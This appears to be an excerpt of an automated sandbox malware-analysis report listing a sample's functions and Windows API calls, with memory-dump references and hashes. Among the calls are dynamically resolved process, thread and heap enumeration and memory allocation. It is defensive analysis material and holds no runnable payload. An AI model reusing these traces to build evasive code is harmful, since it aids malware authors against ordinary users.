                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                          • Opcode ID: 2ee6f18274b7b96a82f062c7517b6ecca7a55ddbabd382db5d2e3a18599cb5bf
                                                                                                                                                                          • Instruction ID: 8c5fd168323e1fc3e0ce287d8a297e81de1c8a6765cdd37cd6fe36247a669534
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ee6f18274b7b96a82f062c7517b6ecca7a55ddbabd382db5d2e3a18599cb5bf
                                                                                                                                                                          • Instruction Fuzzy Hash: 60C092F17C43607EFE10E6B95CD2F7722CDD344B11F600962BA00EE2C1D6E6A8519A20
                                                                                                                                                                          Function 02904BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02904BEB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                          • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                                                          • Instruction ID: 14dcfc4f0cd0ec749cd51af4df85a2c6e3c9398a0cbf677202464b278b39b246
                                                                                                                                                                          • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                                                          • Instruction Fuzzy Hash: 12B0123C64820E1DFB1022610DC0B3A008C0F90387F842095AF28C80C0FF00C400C832
                                                                                                                                                                          Function 02904BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02904C03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                          • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                                                          • Instruction ID: 76d4ddf727fc4a124f8645e1adf5f0a010c50294ebb42ced1c4e73096f21436c
                                                                                                                                                                          • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 30A022AC00032F0E8F0B332C00C002A203B3FE0B003CAC0E822000A0C08F3A8000AC30
                                                                                                                                                                          Function 029015CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02901A03,?,02902000), ref: 029015E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: 0ade6c37ad43fbbac472d694a06e43707fded6561c96f8384235573879bae272
                                                                                                                                                                          • Instruction ID: 53ddcf1b603f2382469ea519f7b8325899f9f6c7a8c1e1a87abe28bf5eeadcad
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ade6c37ad43fbbac472d694a06e43707fded6561c96f8384235573879bae272
                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF049F1B453004FDF05DF7999803167AD6EB8A354F108579E609DB7C8E77184018F00
                                                                                                                                                                          Function 02901682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02902000), ref: 029016A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: e3b141adbbf71aff64783a677a8bd72311a03364e1b30f7589fbc86a9beb9638
                                                                                                                                                                          • Instruction ID: 7ddf119d6418768dea688931ead6278e4e46580618aab61328d99c88943a4b09
                                                                                                                                                                          • Opcode Fuzzy Hash: e3b141adbbf71aff64783a677a8bd72311a03364e1b30f7589fbc86a9beb9638
                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF0BEB2F447996FD7109F9A9CC4B92BBE4FB44365F05023AFA0C9B380D770A8508B94
                                                                                                                                                                          Function 029016E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02901704
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                          • Opcode ID: f9360cdd823172fb64d199756a282b3356317f979f6fcb53af22d0f0221c3ce7
                                                                                                                                                                          • Instruction ID: 018c50220399187fcce5984189cd79c275a134c3f05021f51eeb7c11bdf8e87e
                                                                                                                                                                          • Opcode Fuzzy Hash: f9360cdd823172fb64d199756a282b3356317f979f6fcb53af22d0f0221c3ce7
                                                                                                                                                                          • Instruction Fuzzy Hash: 68E08C75300305AFE7105ABE5DC4B12ABDDEB88764F24487AF609DB2C1D6A0E8108B64

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 0291A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291ABDB,?,?,0291AC6D,00000000,0291AD49), ref: 0291A968
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0291A980
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0291A992
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0291A9A4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0291A9B6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0291A9C8
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0291A9DA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0291A9EC
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0291A9FE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0291AA10
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0291AA22
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0291AA34
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0291AA46
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0291AA58
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0291AA6A
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0291AA7C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0291AA8E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                          • Opcode ID: 58d725f5014af47f33fd86fb9d8038c6e28574aa704b3424268e362d9e2db625
                                                                                                                                                                          • Instruction ID: 70f003d79aec1135c91d3610af68ea51d25f2001a1fb2c6055481af5eeca682d
                                                                                                                                                                          • Opcode Fuzzy Hash: 58d725f5014af47f33fd86fb9d8038c6e28574aa704b3424268e362d9e2db625
                                                                                                                                                                          • Instruction Fuzzy Hash: 3931AFB1E857289FEB119FB5D9E9A3637EAAB857107000969E501CF2C4D7749820CF51
                                                                                                                                                                          Function 029058B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02907330,02900000,0292E790), ref: 029058D1
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029058E8
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02905918
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 0290597C
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059B2
                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059C5
                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059D7
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000,0292E790), ref: 029059E3
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330,02900000), ref: 02905A17
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02907330), ref: 02905A23
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02905A45
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                          • Opcode ID: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
                                                                                                                                                                          • Instruction ID: 21ea11e3a9ba8686979c2074f08458f0ed82b6e8e51211b2f8388ca496123e9c
                                                                                                                                                                          • Opcode Fuzzy Hash: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D415972D0025DAFDF10DAE8CCC8ADEB3AEBF88340F4545A5A548E7281E7709E848F50
                                                                                                                                                                          Function 02905B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02905BD2
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C19
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C29
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C51
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C61
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02905C87
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02905C97
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                          • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                                                          • Instruction ID: 4b742e49320376fe1032128520df7ee0e3a373eeac34abaf8586aa5bfab8720b
                                                                                                                                                                          • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A319371E4022C6EEF25D6B88CC9BDF77ED5B44380F4545E1A608E61C5DA749E848F90
                                                                                                                                                                          Function 02907F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02907F75
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                                                          • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                                                                          • Instruction ID: 82549167c9f249de051ae610fbcad183a742ba8ced5a528714cd1225ecc2cb5d
                                                                                                                                                                          • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                                                                          • Instruction Fuzzy Hash: F31100B5A00209AF9B04CF99C8809BFF7F9FFC8704B14C569A504EB254E6319A01CB90
                                                                                                                                                                          Function 0290A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                                                          • Instruction ID: 6ddae238a1a5c8c9028d8704a63679cb9fa64fa281694bdec49fddbda5a100f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0D836B0021C1BD711A5685CC0AFE739D9B9C310F00817EBE05C73C0EEA0AD804EE4
                                                                                                                                                                          Function 0290B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExA.KERNEL32(?,0292D106,00000000,0292D11E), ref: 0290B71A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 80a49eb307bd9b317d9d30c1671dcf9b045a41b38492d78462f53a3d794ec875
                                                                                                                                                                          • Instruction ID: 90ab417ac0057f6f01dbfdfab3585d113d53bf6e751f4e5dfbc5ab70994660b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 80a49eb307bd9b317d9d30c1671dcf9b045a41b38492d78462f53a3d794ec875
                                                                                                                                                                          • Instruction Fuzzy Hash: C9F0AF749483059FD364DF28D5C0A2677EDFB88B14F019D29EAD8C7790E734A8288F52
                                                                                                                                                                          Function 0290A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0290BDF2,00000000,0290C00B,?,?,00000000,00000000), ref: 0290A7A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                                                          • Instruction ID: 1e8fe1f2256b32fdd7470116084bf0e4c16e77ab6df944c7c2b130f40ca34d6d
                                                                                                                                                                          • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                                                          • Instruction Fuzzy Hash: BCD05EA631E2642EA220915A2DC4EBB5AFDCAC57A1F04843EF688C6281D2008C0596F1
